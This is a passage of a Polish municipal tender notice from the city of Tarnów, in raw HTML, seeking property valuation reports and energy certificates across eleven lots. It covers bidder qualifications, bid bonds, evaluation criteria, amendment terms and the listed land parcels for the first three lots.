Wizji na nieruchomości należy dokonać po uprzednim poinformowaniu o jej terminie właściciela. Z wizji na nieruchomości należy sporządzić stosowny protokół.<br /><br /><b>II.5) Główny kod CPV: </b>71319000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              37208.78<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 21<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający będzie punktował skrócenie terminu wykonania zamówienia</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej jeżeli wykaże, że dysponuje lub będzie dysponować osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług: 
A. W przypadku składania oferty na zadanie nr 1 i/lub nr 2 i/lub nr 3 i/lub nr 4 i/lub nr 5 i/lub nr 6 i/lub nr 7 i/lub nr 8 i/lub nr 9 i/lub nr 10 i/lub nr 11 minimum jedną osobą z uprawnieniami rzeczoznawcy majątkowego w zakresie szacowania nieruchomości, o których mowa w art. 174 ust. 2 ustawy z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz.U. z 2016 r. poz. 2147 z późn. zm.) lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów. Wymaga się, aby osoba ta posiadała doświadczenie w zakresie sporządzania operatów szacunkowych  ilość operatów szacunkowych, które osoba wykonała  minimum 5.
B. W przypadku składania oferty na zadanie nr 6 dodatkowo minimum jedną osobą uprawnioną do sporządzania świadectw charakterystyki energetycznej - zgodnie z art. 17 ustawy z dnia 29 sierpnia 2014 r. o charakterystyce energetycznej budynków (Dz.U. z 2014 r. poz. 1200) - która:
1) posiada pełną zdolność do czynności prawnych;
2) nie była skazana prawomocnym wyrokiem za przestępstwo przeciwko mieniu, wiarygodności dokumentów, obrotowi gospodarczemu, obrotowi pieniędzmi i papierami wartościowymi lub za przestępstwo skarbowe;
3) ukończyła:
3.1.) studia wyższe zakończone uzyskaniem tytułu zawodowego inżyniera, inżyniera architekta, inżyniera architekta krajobrazu, inżyniera pożarnictwa, magistra inżyniera architekta, magistra inżyniera architekta krajobrazu, magistra inżyniera pożarnictwa albo magistra inżyniera, albo
3.2.) studia wyższe inne niż wymienione w pkt 3.1 oraz studia podyplomowe, których program uwzględnia zagadnienia związane z charakterystyką energetyczną budynków, wykonywaniem audytów energetycznych budynków, budownictwem energooszczędnym i odnawialnymi źródłami energii,
lub
4) posiada uprawnienia budowlane, o których mowa w art. 14 ust. 1 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz.U.2016.290), tj: uprawnienia budowlane w specjalnościach:
4.1.) architektonicznej;
4.2.) konstrukcyjno-budowlanej;
4.3.) inżynieryjnej:
a) mostowej,
b) drogowej,
c) kolejowej,
d) hydrotechnicznej,
e) wyburzeniowej,
4.4.) instalacyjnej w zakresie sieci, instalacji i urządzeń:
a) telekomunikacyjnych,
b) cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
c) elektrycznych i elektroenergetycznych
lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów,
lub została wpisana wykazu osób uprawnionych do sporządzania świadectw charakterystyki energetycznej objętego centralnym rejestrem charakterystyki energetycznej budynków prowadzonym przez ministra właściwego do spraw budownictwa.
Wymaga się, aby osoba ta posiadała doświadczenie w zakresie sporządzania świadectw charakterystyki energetycznej  ilość świadectw charakterystyki energetycznej, które osoba wykonała  minimum 3.
Ze względu na możliwość złożenia oferty na JEDENAŚCIE zadań, dopuszcza się  w przypadku składania oferty na zadanie nr 6 - łączenie funkcji przez jedną osobę pod warunkiem, że osoba ta będzie posiadała wymagane doświadczenie, kwalifikacje i/lub wyksztalcenie, jak również wykazanie tych samych osób na poszczególne części zamówienia.
W przypadku Wykonawców zagranicznych dopuszcza się równoważne kwalifikacje nabyte w państwach członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub Europejskiego Porozumienia o Wolnym Handlu (EFTA)  stronach umowy o Europejskim Obszarze Gospodarczym, pod warunkiem, że zachowują swoją ważność oraz z zastrzeżeniem przepisu art. 12a ustawy Prawo budowlane (Dz. U. z 2016, poz. 290 z późn. zm.) i przepisów ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016, poz. 65). <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Przed udzieleniem zamówienia, Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w terminie 7 dni, aktualnego na dzień złożenia dokumentu potwierdzającego okoliczności, o których mowa w art. 25 ust. 1 ustawy, a uszczegółowionych w rozdz. III.1.3), tj.:
wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji, doświadczenia zawodowego niezbędnego do wykonania zamówienia publicznego (liczba wykonanych usług), a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając w oryginale zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
2. Ewentualne pełnomocnictwa złożone do przetargu mają być podpisane przez osobę upoważnioną do zaciągania zobowiązań cywilno-prawnych w imieniu Wykonawcy bądź członków konsorcjum. Pełnomocnictwo należy przedstawić w formie oryginału lub kopii poświadczonej notarialnie. Pełnomocnictwo w sposób jednoznaczny ma określać do jakich czynności upoważniona jest osoba (zgodnie z wyrokiem Sądu Okręgowego w Warszawie z dnia 31.01.2007 r., sygn. Akt V Ca 85/07).
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium w wysokości:
Zadanie nr 1: 10,00 zł (słownie: dziesięć złotych)
Zadanie nr 2: 250,00 zł (słownie: dwieście pięćdziesiąt złotych)
Zadanie nr 3: 280,00 zł (słownie: dwieście osiemdziesiąt złotych)
Zadanie nr 4: 250,00 zł (słownie: dwieście pięćdziesiąt złotych)
Zadanie nr 5: 30,00 zł (słownie: trzydzieści złotych)
Zadanie nr 6: 160,00 zł (słownie: sto sześćdziesiąt złotych)
Zadanie nr 7: 20,00 zł (słownie: dwadzieścia złotych)
Zadanie nr 8: wadium nie jest wymagane
Zadanie nr 9: wadium nie jest wymagane
Zadanie nr 10: 30,00 zł (słownie: trzydzieści złotych)
Zadanie nr 11: 20,00 zł (słownie: dwadzieścia złotych)
2. Wykonawca może wnieść wadium w formach określonych w art. 45 ust. 6 ustawy Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia </td><td>0.05</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zamawiający dopuszcza zmiany osób uczestniczących przy wykonywaniu umowy, które są w niej wymienione - w trakcie realizacji umowy. Zmiana musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. Zamawiający zaakceptuje zmianę taką wyłącznie wtedy, gdy kwalifikacje i doświadczenie proponowanych osób będą nie gorsze niż wymagane postanowieniami Specyfikacji Istotnych Warunków Zamówienia.
2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy dotyczących zmiany sposobu i zakresu wykonania zamówienia w przypadku zmiany przepisów prawnych powodujących konieczność dokonania zmian w umowie, a także zmniejszenia ilości zlecanych do sporządzenia operatów szacunkowych, w przypadku zaistnienia istotnych okoliczności powodujących, że wykonanie niektórych operatów szacunkowych nie leży w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy lub przed jej podpisaniem.
3. Zmiany treści umowy dopuszczone w pkt 1 - 2 nie mogą prowadzić do zwiększenia wynagrodzenia określonego w umowie.
4. Zamawiający przewiduje także zmianę postanowień umowy w przypadku zmiany stawek podatku od towarów i usług.
5. Każda ze stron zobowiązana jest niezwłocznie poinformować o okolicznościach stanowiących podstawę do dokonania zmiany w umowie.
6. Wszelkie zmiany umowy mogą być dokonywane wyłącznie w formie aneksu do umowy pod rygorem nieważności z uwzględnieniem art. 144 ustawy Pzp. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/03/2017, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Zamawiający nie przewiduje zawarcia umowy ramowej oraz ustanowienia dynamicznego systemu zakupów</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie trzech operatów szacunkowych określających wartość rynkową niezabudowanych nieruchomości stanowiących własność Gminy Miasta Tarnowa przeznaczonych do zbycia w trybie przetargu ustnego ograniczonego na poprawienie warunków zagospodarowania nieruchomości przyległych. Wycena dotyczy nieruchomości oznaczonych jako:
1) działka nr 31/1 obrębu 5 o powierzchni 41 m2 położona przy ul. Klikowskiej w Tarnowie, objęta księgą wieczystą nr TR1T/00076042/5; poprawienie warunków zagospodarowania nieruchomości przyległej oznaczonej jako działka nr 31/3 obrębu 5 (własność prywatna - jeden właściciel),
2) działka nr 45/3 obrębu 5 o powierzchni 23 m2 położona przy ul. Klikowskiej w Tarnowie, objęta księgą wieczystą nr TR1T/00076047/0; poprawienie warunków zagospodarowania nieruchomości przyległej oznaczonej jako działki nr 43/2 obrębu 5 (własność prywatna - jeden właściciel) oraz nr 45/4 i 44/5 obrębu 5 (własność prywatna - jeden właściciel),
3) działka nr 32/1 obrębu 257 o powierzchni 697 m2 położona przy ul. Sióstr Służebniczek w Tarnowie, objęta księgą wieczystą nr TR1T/00078301/3; poprawienie warunków zagospodarowania nieruchomości przyległej oznaczonej jako działki nr 32/2 obrębu 257 (własność prywatna - dwóch współwłaścicieli w częściach ułamkowych) oraz nr 20/4 obrębu 257 (własność prywatna - jeden właściciel). Nakłady dokonane na nieruchomości przyległej przez jej właściciela nie podlegają wycenie.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  609.76<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia </td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie siedmiu operatów szacunkowych określających wartości rynkowe nieruchomości gruntowych położonych w Tarnowie w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.) dla wymienionych poniżej nieruchomości.
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Lp.	Nr działki	Obręb	Powierzchnia [m2]	Nr księgi wieczystej
1	25/9	200	3202	Nr ksiąg wieczystych zostanie udostępniony Wykonawcy, którego oferta zostanie wybrana
2	124/15	200	486	
	124/16		225	
3	238/6	200	2847	
4	1/301	200	781	
5	255/6	200	2416	
6	236/4	200	1077	
	236/12		211	
7	1/94	200	257	
	1/95		529	
	1/294		218	
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  8365.85<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 21<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>0.95</td></tr><tr><td>Termin wykonania zamówienia</td><td>0.05</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wykonanie ośmiu operatów szacunkowych określających wartości rynkowe nieruchomości gruntowych położonych w Tarnowie w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.) dla wymienionych poniżej nieruchomości.
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Lp.	Nr działki	Obręb	Powierzchnia [m2]	Nr księgi wieczystej	Uwagi
1	226/19	172	242	Nr ksiąg wieczystych zostanie udostępniony Wykonawcy, którego oferta zostanie wybrana	
	227/1		1675		
	11/27		1485		
	11/29		402		
2	188/12	172	491		
	188/13		159		
3	228/4	172	3328		podział działki na 228/20, 228/21
4	8/13	172	1455		
5	238/6	172	900		
	238/7		900		
6	10/26	172	3008		
7	52	173	764		
8	16/8	173	1059		
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  9560.98<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">pln<br /><b>4) Czas trwania lub termin wykonania: </b>
